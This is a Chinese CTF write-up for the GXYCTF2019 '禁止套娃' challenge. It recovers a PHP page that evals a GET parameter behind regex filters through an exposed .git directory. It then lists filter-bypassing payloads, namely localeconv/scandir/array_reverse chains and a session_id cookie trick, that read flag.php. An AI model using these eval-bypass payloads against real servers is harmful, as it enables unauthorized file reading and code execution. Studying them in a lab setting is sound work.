[GXYCTF2019]禁止套娃 无回显 RCE 过滤__FILE__ dirname等

扫除git

通过githack

获取index.php

复制代码
<?php
include "flag.php";
echo "flag在哪里呢?<br>";
if(isset($_GET['exp'])){
    if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['exp'])) {
        if(';' === preg_replace('/[a-z,_]+\((?R)?\)/', NULL, $_GET['exp'])) {
            if (!preg_match('/et|na|info|dec|bin|hex|oct|pi|log/i', $_GET['exp'])) {
                // echo $_GET['exp'];
                @eval($_GET['exp']);
            }
            else{
                die("还差一点哦!");
            }
        }
        else{
            die("再好好想想!");
        }
    }
    else{
        die("还想读flag,臭弟弟!");
    }
}
// highlight_file(__FILE__);
?>

发现是命令执行 并且存在过滤

我们之前使用的 print_r(dirname(FILE));

在这里不可以使用

1.localeconv()

直接上payload了

复制代码
print_r(localeconv());

通过current指定第一个 .

复制代码
?exp=print_r(current(localeconv()));

这样我们配合 scandir 就可以实现 scandir('.')了

复制代码
?exp=print_r(scandir(current(localeconv())));

这里我们无法使用\[\] 所以我们可以通过 array_reverse 倒序数组 然后next即可

复制代码
?exp=print_r(next(array_reverse(scandir(current(localeconv())))));
复制代码
/?exp=highlight_file(next(array_reverse(scandir(current(localeconv())))));

2.seesion_id

正常情况下 不开启 seesion 服务 但是如果我们可以通过 seesion_start()开启

我们就可以通过 seesion传递值

复制代码
?exp=print_r(session_id(session_start()))


bp中加

Cookie: PHPSESSID=flag.php

然后一样通过 highlight_file即可

相关推荐
钟智强18 小时前
我警告了 329 天
git·php·wordpress·webshell
从零开始的代码生活_20 小时前
Linux 五种 IO 模型详解
linux·服务器·数据库·c++·后端·php
AC赳赳老秦2 天前
防火墙规则批量配置实战:OpenClaw 自动生成模板、批量下发与合规性校验全解析
java·开发语言·人工智能·python·github·php·openclaw
2502_921286072 天前
【企业网络管理】DHCP 与 SAMBA:从协议原理到企业级实战配置全解析
开发语言·php
运维管理2 天前
H3C SecPath W2000-G[AK]系列Web应用防火墙 典型配置举例(E6711 E6712 E6713)-6W108-H3C 官方配置
服务器·网络·php
techdashen2 天前
kTLS 进入 rustls 组织:把 TLS 的数据面交给内核
开发语言·php
Web极客码2 天前
在WordPress Multisite中添加超级管理员用户
服务器·php·网站
漂亮的摩托2 天前
深感一无所长,准备试着从零开始写个富文本编辑器
开发语言·php
火星校尉2 天前
一场数据基建与消费场景的跨界实验
java·前端·数据库·python·php